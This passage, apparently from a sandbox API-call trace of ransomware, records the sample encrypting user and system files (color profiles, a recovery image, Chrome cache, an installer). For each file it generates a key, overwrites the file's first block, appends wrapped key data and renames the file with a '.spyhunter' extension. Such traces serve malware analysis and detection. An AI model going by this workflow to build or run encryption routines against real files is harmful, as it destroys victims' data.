(HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0130.170] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.spyhunter") returned 88 [0130.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.spyhunter")) returned 1 [0130.171] GetProcessHeap () returned 0x2c0000 [0130.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0130.171] GetProcessHeap () returned 0x2c0000 [0130.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0130.171] GetProcessHeap () returned 0x2c0000 [0130.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef9a0 | out: hHeap=0x2c0000) returned 1 [0130.171] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f418 | out: pbBuffer=0x270f418) returned 1 [0130.171] GetProcessHeap () returned 0x2c0000 [0130.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0130.171] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f410*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f410*=0x30) returned 1 [0130.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0130.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 79 [0130.172] StrStrW (lpFirst="wscRGB.icc", lpSrch=".txt") returned 0x0 [0130.172] GetProcessHeap () returned 0x2c0000 [0130.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0130.172] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f3d4*=0x2800, lpOverlapped=0x0) returned 1 [0130.193] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.193] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f3d4*=0x2800, lpOverlapped=0x0) returned 1 [0130.195] GetProcessHeap () returned 0x2c0000 [0130.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0130.195] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.195] WriteFile (in: hFile=0xec, lpBuffer=0x270f414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x270f414*, lpNumberOfBytesWritten=0x270f3d4*=0x4, lpOverlapped=0x0) returned 1 [0130.218] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3d4*=0x30, lpOverlapped=0x0) returned 1 [0130.218] CloseHandle (hObject=0xec) returned 1 [0130.218] GetProcessHeap () returned 0x2c0000 [0130.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.218] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.spyhunter") returned 89 [0130.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.spyhunter")) returned 1 [0130.256] GetProcessHeap () returned 0x2c0000 [0130.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.256] GetProcessHeap () returned 0x2c0000 [0130.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0130.256] GetProcessHeap () returned 0x2c0000 [0130.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eefa88 | out: hHeap=0x2c0000) returned 1 [0130.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f410 | out: pbBuffer=0x270f410) returned 1 [0130.256] GetProcessHeap () returned 0x2c0000 [0130.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0130.257] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f408*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f408*=0x30) returned 1 [0130.257] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0130.257] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0130.257] StrStrW (lpFirst="boot.sdi", lpSrch=".txt") returned 0x0 [0130.257] GetProcessHeap () returned 0x2c0000 [0130.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.257] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3cc*=0x2800, lpOverlapped=0x0) returned 1 [0130.302] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.302] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3cc*=0x2800, lpOverlapped=0x0) returned 1 [0130.510] GetProcessHeap () returned 0x2c0000 [0130.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.510] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.510] WriteFile (in: hFile=0xec, lpBuffer=0x270f40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3cc, lpOverlapped=0x0 | out: lpBuffer=0x270f40c*, lpNumberOfBytesWritten=0x270f3cc*=0x4, lpOverlapped=0x0) returned 1 [0130.513] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3cc*=0x30, lpOverlapped=0x0) returned 1 [0130.633] CloseHandle (hObject=0xec) returned 1 [0130.633] GetProcessHeap () returned 0x2c0000 [0130.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.633] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.spyhunter") returned 71 [0130.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.spyhunter" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.spyhunter")) returned 1 [0130.697] GetProcessHeap () returned 0x2c0000 [0130.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.697] GetProcessHeap () returned 0x2c0000 [0130.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0130.697] GetProcessHeap () returned 0x2c0000 [0130.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84f10 | out: hHeap=0x2c0000) returned 1 [0130.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f408 | out: pbBuffer=0x270f408) returned 1 [0130.700] GetProcessHeap () returned 0x2c0000 [0130.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0130.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f400*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f400*=0x30) returned 1 [0130.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0130.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0130.701] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0130.701] GetProcessHeap () returned 0x2c0000 [0130.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0130.701] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f3c4*=0x2800, lpOverlapped=0x0) returned 1 [0131.015] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0131.015] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f3c4*=0x2800, lpOverlapped=0x0) returned 1 [0131.015] GetProcessHeap () returned 0x2c0000 [0131.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0131.015] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.015] WriteFile (in: hFile=0xec, lpBuffer=0x270f404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x270f404*, lpNumberOfBytesWritten=0x270f3c4*=0x4, lpOverlapped=0x0) returned 1 [0131.248] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3c4*=0x30, lpOverlapped=0x0) returned 1 [0131.248] CloseHandle (hObject=0xec) returned 1 [0132.079] GetProcessHeap () returned 0x2c0000 [0132.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.079] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.spyhunter") returned 174 [0132.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.spyhunter")) returned 1 [0132.079] GetProcessHeap () returned 0x2c0000 [0132.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.080] GetProcessHeap () returned 0x2c0000 [0132.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.080] GetProcessHeap () returned 0x2c0000 [0132.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18048 | out: hHeap=0x2c0000) returned 1 [0132.080] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f408 | out: pbBuffer=0x270f408) returned 1 [0132.080] GetProcessHeap () returned 0x2c0000 [0132.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f400*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f400*=0x30) returned 1 [0132.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0132.085] StrStrW (lpFirst="data_2", lpSrch=".txt") returned 0x0 [0132.085] GetProcessHeap () returned 0x2c0000 [0132.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.085] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3c4*=0x2000, lpOverlapped=0x0) returned 1 [0132.098] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.098] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3c4*=0x2000, lpOverlapped=0x0) returned 1 [0132.098] GetProcessHeap () returned 0x2c0000 [0132.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.098] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.098] WriteFile (in: hFile=0x158, lpBuffer=0x270f404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x270f404*, lpNumberOfBytesWritten=0x270f3c4*=0x4, lpOverlapped=0x0) returned 1 [0132.098] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3c4*=0x30, lpOverlapped=0x0) returned 1 [0132.099] CloseHandle (hObject=0x158) returned 1 [0132.099] GetProcessHeap () returned 0x2c0000 [0132.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.099] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.spyhunter") returned 102 [0132.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2.spyhunter")) returned 1 [0132.100] GetProcessHeap () returned 0x2c0000 [0132.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.100] GetProcessHeap () returned 0x2c0000 [0132.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.100] GetProcessHeap () returned 0x2c0000 [0132.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b460 | out: hHeap=0x2c0000) returned 1 [0132.100] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f400 | out: pbBuffer=0x270f400) returned 1 [0132.100] GetProcessHeap () returned 0x2c0000 [0132.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.100] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3f8*=0x30) returned 1 [0132.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0132.101] StrStrW (lpFirst="data_0", lpSrch=".txt") returned 0x0 [0132.101] GetProcessHeap () returned 0x2c0000 [0132.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.101] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3bc*=0x2800, lpOverlapped=0x0) returned 1 [0132.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.283] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3bc*=0x2800, lpOverlapped=0x0) returned 1 [0132.283] GetProcessHeap () returned 0x2c0000 [0132.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.283] WriteFile (in: hFile=0x158, lpBuffer=0x270f3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3bc, lpOverlapped=0x0 | out: lpBuffer=0x270f3fc*, lpNumberOfBytesWritten=0x270f3bc*=0x4, lpOverlapped=0x0) returned 1 [0132.283] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3bc*=0x30, lpOverlapped=0x0) returned 1 [0132.284] CloseHandle (hObject=0x158) returned 1 [0132.284] GetProcessHeap () returned 0x2c0000 [0132.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.284] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.spyhunter") returned 102 [0132.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0.spyhunter")) returned 1 [0132.284] GetProcessHeap () returned 0x2c0000 [0132.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.285] GetProcessHeap () returned 0x2c0000 [0132.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.285] GetProcessHeap () returned 0x2c0000 [0132.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b250 | out: hHeap=0x2c0000) returned 1 [0132.286] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3f8 | out: pbBuffer=0x270f3f8) returned 1 [0132.286] GetProcessHeap () returned 0x2c0000 [0132.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3f0*=0x30) returned 1 [0132.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0132.287] StrStrW (lpFirst="settings.dat", lpSrch=".txt") returned 0x0 [0132.287] GetProcessHeap () returned 0x2c0000 [0132.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.288] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3b4*=0x28, lpOverlapped=0x0) returned 1 [0132.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.288] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x270f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3b4*=0x28, lpOverlapped=0x0) returned 1 [0132.289] GetProcessHeap () returned 0x2c0000 [0132.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.289] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.289] WriteFile (in: hFile=0x158, lpBuffer=0x270f3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3b4, lpOverlapped=0x0 | out: lpBuffer=0x270f3f4*, lpNumberOfBytesWritten=0x270f3b4*=0x4, 